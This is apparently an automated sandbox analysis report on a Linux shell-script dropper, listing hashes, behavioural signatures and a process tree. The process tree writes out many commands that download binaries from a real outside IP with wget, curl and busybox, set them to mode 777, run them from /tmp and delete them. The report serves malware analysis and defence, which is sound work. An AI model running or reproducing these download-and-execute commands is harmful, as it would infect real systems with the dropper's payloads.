Analysis
-
max time kernel
41s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
24/11/2024, 02:02
Static task
static1
Behavioral task
behavioral1
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
-
Size
10KB
-
MD5
90e40b4503b0424a058f69437e1026ff
-
SHA1
035df066045d7bc2ab807fc923f25cf1a0f3e70e
-
SHA256
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474
-
SHA512
adfa914962ae7273bfd9238ce16c5b177765452a64ba873335cc42fdab6cf5cf072fb12803403aa10b44c957efbc5e2a76de724c912bde8c573afee70a1a1795
-
SSDEEP
192:8zddR70qV5mSi1dGxvSgM3omSi1de72gdR70qVa:8zddR70kHxvSgM3S72gdR70ka
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1540 chmod 1570 chmod 1606 chmod 1650 chmod 1528 chmod 1612 chmod 1624 chmod 1552 chmod 1618 chmod 1630 chmod 1656 chmod 1680 chmod 1686 chmod 1522 chmod 1534 chmod 1558 chmod 1564 chmod 1588 chmod 1642 chmod 1582 chmod 1662 chmod 1674 chmod 1600 chmod 1636 chmod 1668 chmod 1546 chmod 1576 chmod 1594 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH 1523 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH /tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 1529 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 /tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ 1535 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ /tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd 1541 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd /tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ 1547 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ /tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p 1553 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p /tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS 1559 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS /tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj 1565 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj /tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr 1571 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr /tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ 1577 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ /tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc 1583 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc /tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 1589 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 /tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 1595 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 /tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo 1601 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo /tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ 1607 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ /tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc 1613 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc /tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS 1619 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS /tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj 1625 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj /tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr 1631 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr /tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 1637 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 /tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 1643 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 /tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo 1651 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo /tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH 1657 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH /tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 1663 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 /tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ 1669 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ /tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd 1675 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd /tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ 1681 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ /tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p 1687 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH curl File opened for modification /tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc curl File opened for modification /tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 curl File opened for modification /tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj curl File opened for modification /tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 curl File opened for modification /tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo curl File opened for modification /tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd curl File opened for modification /tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS curl File opened for modification /tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr curl File opened for modification /tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 curl File opened for modification /tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 curl File opened for modification /tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH curl File opened for modification /tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ curl File opened for modification /tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd curl File opened for modification /tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p curl File opened for modification /tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ curl File opened for modification /tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc curl File opened for modification /tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr curl File opened for modification /tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ curl File opened for modification /tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj curl File opened for modification /tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 curl File opened for modification /tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ curl File opened for modification /tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ curl File opened for modification /tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 curl File opened for modification /tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS curl File opened for modification /tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p curl File opened for modification /tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ curl File opened for modification /tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo curl
Processes
-
/tmp/0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh/tmp/0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh1⤵PID:1513
-
/bin/rm/bin/rm bins.sh2⤵PID:1514
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:1515
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:1521
-
-
/bin/chmodchmod 777 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- File and Directory Permissions Modification
PID:1522
-
-
/tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH./j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Executes dropped EXE
PID:1523
-
-
/bin/rmrm j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:1524
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:1525
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Writes file to tmp directory
PID:1526
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:1527
-
-
/bin/chmodchmod 777 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- File and Directory Permissions Modification
PID:1528
-
-
/tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4./9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Executes dropped EXE
PID:1529
-
-
/bin/rmrm 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:1530
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:1531
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Writes file to tmp directory
PID:1532
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:1533
-
-
/bin/chmodchmod 777 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ./Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Executes dropped EXE
PID:1535
-
-
/bin/rmrm Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:1536
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:1537
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Writes file to tmp directory
PID:1538
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:1539
-
-
/bin/chmodchmod 777 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd./bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Executes dropped EXE
PID:1541
-
-
/bin/rmrm bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:1542
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:1543
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Writes file to tmp directory
PID:1544
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:1545
-
-
/bin/chmodchmod 777 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- File and Directory Permissions Modification
PID:1546
-
-
/tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ./glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Executes dropped EXE
PID:1547
-
-
/bin/rmrm glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:1548
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:1549
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Writes file to tmp directory
PID:1550
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:1551
-
-
/bin/chmodchmod 777 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p./qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Executes dropped EXE
PID:1553
-
-
/bin/rmrm qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:1554
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:1555
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:1557
-
-
/bin/chmodchmod 777 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- File and Directory Permissions Modification
PID:1558
-
-
/tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS./9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Executes dropped EXE
PID:1559
-
-
/bin/rmrm 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:1560
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:1561
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Writes file to tmp directory
PID:1562
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:1563
-
-
/bin/chmodchmod 777 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj./eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Executes dropped EXE
PID:1565
-
-
/bin/rmrm eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:1566
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:1567
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Writes file to tmp directory
PID:1568
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:1569
-
-
/bin/chmodchmod 777 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- File and Directory Permissions Modification
PID:1570
-
-
/tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr./vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Executes dropped EXE
PID:1571
-
-
/bin/rmrm vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:1572
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:1573
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Writes file to tmp directory
PID:1574
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:1575
-
-
/bin/chmodchmod 777 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- File and Directory Permissions Modification
PID:1576
-
-
/tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ./1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Executes dropped EXE
PID:1577
-
-
/bin/rmrm 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:1578
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:1579
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:1581
-
-
/bin/chmodchmod 777 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc./uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Executes dropped EXE
PID:1583
-
-
/bin/rmrm uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:1584
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:1585
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Writes file to tmp directory
PID:1586
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:1587
-
-
/bin/chmodchmod 777 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- File and Directory Permissions Modification
PID:1588
-
-
/tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9./mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Executes dropped EXE
PID:1589
-
-
/bin/rmrm mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:1590
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:1591
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Writes file to tmp directory
PID:1592
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:1593
-
-
/bin/chmodchmod 777 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- File and Directory Permissions Modification
PID:1594
-
-
/tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7./0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Executes dropped EXE
PID:1595
-
-
/bin/rmrm 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:1596
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:1597
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Writes file to tmp directory
PID:1598
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:1599
-
-
/bin/chmodchmod 777 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- File and Directory Permissions Modification
PID:1600
-
-
/tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo./NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Executes dropped EXE
PID:1601
-
-
/bin/rmrm NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:1602
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:1603
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Writes file to tmp directory
PID:1604
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:1605
-
-
/bin/chmodchmod 777 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- File and Directory Permissions Modification
PID:1606
-
-
/tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ./1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Executes dropped EXE
PID:1607
-
-
/bin/rmrm 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:1608
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:1609
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Writes file to tmp directory
PID:1610
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:1611
-
-
/bin/chmodchmod 777 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- File and Directory Permissions Modification
PID:1612
-
-
/tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc./uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Executes dropped EXE
PID:1613
-
-
/bin/rmrm uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:1614
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:1615
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Writes file to tmp directory
PID:1616
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:1617
-
-
/bin/chmodchmod 777 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- File and Directory Permissions Modification
PID:1618
-
-
/tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS./9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Executes dropped EXE
PID:1619
-
-
/bin/rmrm 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:1620
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:1621
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Writes file to tmp directory
PID:1622
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:1623
-
-
/bin/chmodchmod 777 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- File and Directory Permissions Modification
PID:1624
-
-
/tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj./eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Executes dropped EXE
PID:1625
-
-
/bin/rmrm eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:1626
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:1627
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Writes file to tmp directory
PID:1628
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:1629
-
-
/bin/chmodchmod 777 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- File and Directory Permissions Modification
PID:1630
-
-
/tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr./vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Executes dropped EXE
PID:1631
-
-
/bin/rmrm vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:1632
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:1633
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Writes file to tmp directory
PID:1634
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:1635
-
-
/bin/chmodchmod 777 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- File and Directory Permissions Modification
PID:1636
-
-
/tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9./mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Executes dropped EXE
PID:1637
-
-
/bin/rmrm mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:1638
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:1639
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Writes file to tmp directory
PID:1640
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:1641
-
-
/bin/chmodchmod 777 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- File and Directory Permissions Modification
PID:1642
-
-
/tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7./0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Executes dropped EXE
PID:1643
-
-
/bin/rmrm 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:1644
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:1645
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Writes file to tmp directory
PID:1646
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:1649
-
-
/bin/chmodchmod 777 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- File and Directory Permissions Modification
PID:1650
-
-
/tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo./NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Executes dropped EXE
PID:1651
-
-
/bin/rmrm NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:1652
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:1653
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Writes file to tmp directory
PID:1654
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:1655
-
-
/bin/chmodchmod 777 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- File and Directory Permissions Modification
PID:1656
-
-
